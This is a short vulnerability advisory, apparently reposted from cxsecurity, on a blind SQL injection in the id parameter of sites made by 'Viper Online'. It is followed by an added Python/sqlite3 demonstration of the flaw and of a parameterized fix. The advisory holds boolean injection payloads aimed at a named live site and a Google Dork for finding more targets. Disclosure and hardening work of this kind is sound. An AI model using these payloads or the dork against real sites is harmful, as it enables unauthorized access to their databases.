Viper Online - Blind SQL Injection Vulnerability
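Viper Online was found to have a blind SQL injection vulnerability affecting the id parameter in URLs. An attacker can exploit it by sending specially crafted requests. For example, adding injected SQL to the parameter, as in product.php?id=50' and 1=1--+, triggers the vulnerability. The vulnerability was discovered by AmirHossein Abdollahi, who also provided a corresponding Google Dork for identifying target sites. 2025-5-1 18:24:34 Author: cxsecurity.com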

*********************************************************
# Exploit Title: Viper Online - Blind SQL Injection Vulnerability
# Date: 2025-05-01
# Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer
# Google Dork: intext:"Website by: Viper Online"
# Category: WebApps
# Tested On: Windows, Firefox
*********************************************************
[+] Vulnerable Parameter: `id` in URLs with `.php?id=`
*********************************************************
### Demo:
http://reomart.kgpl.com/product.php?id=50' and 1=1--+
http://reomart.kgpl.com/product.php?id=50' and 1=2--+
*********************************************************
[+] Google Dork: intext:"Website by: Viper Online"
*********************************************************
# Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer
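Added example, not part of the advisory or the vendor's code: a Python/sqlite3 stand-in for the application's lookup, showing why the two demo requests return different results when `id` is concatenated into the query, and that a validated, parameterized lookup treats both the same. The table, the sample row and all function names are assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# The two id values from the advisory's demo URLs, as they appear in the query string.
DEMO_TRUE = "50' and 1=1--+"
DEMO_FALSE = "50' and 1=2--+"


def make_db():
    """In-memory stand-in for the product table (schema and row are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO products VALUES (50, 'constructed sample item')")
    return db


def lookup_vulnerable(db, query_value):
    """Assumed flaw: the decoded parameter is concatenated into the SQL text."""
    raw = unquote_plus(query_value)  # '+' decodes to a space, as a web server would
    sql = "SELECT name FROM products WHERE id = '" + raw + "'"
    return db.execute(sql).fetchall()


def lookup_hardened(db, query_value):
    """Accept only a short decimal id, then bind it as a query parameter."""
    raw = unquote_plus(query_value)
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        return None  # caller answers 400/404 without touching the database
    return db.execute(
        "SELECT name FROM products WHERE id = ?", (int(raw),)
    ).fetchall()


def differs_on_boolean_pair(lookup, db):
    """True when the true/false pair yields different results (the blind-SQLi signal)."""
    return lookup(db, DEMO_TRUE) != lookup(db, DEMO_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable differs:", differs_on_boolean_pair(lookup_vulnerable, db))
    print("hardened differs:  ", differs_on_boolean_pair(lookup_hardened, db))
```

The same true/false comparison works as a regression test after a fix: both requests must produce the same response.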



 



Source: https://cxsecurity.com/issue/WLB-2025050002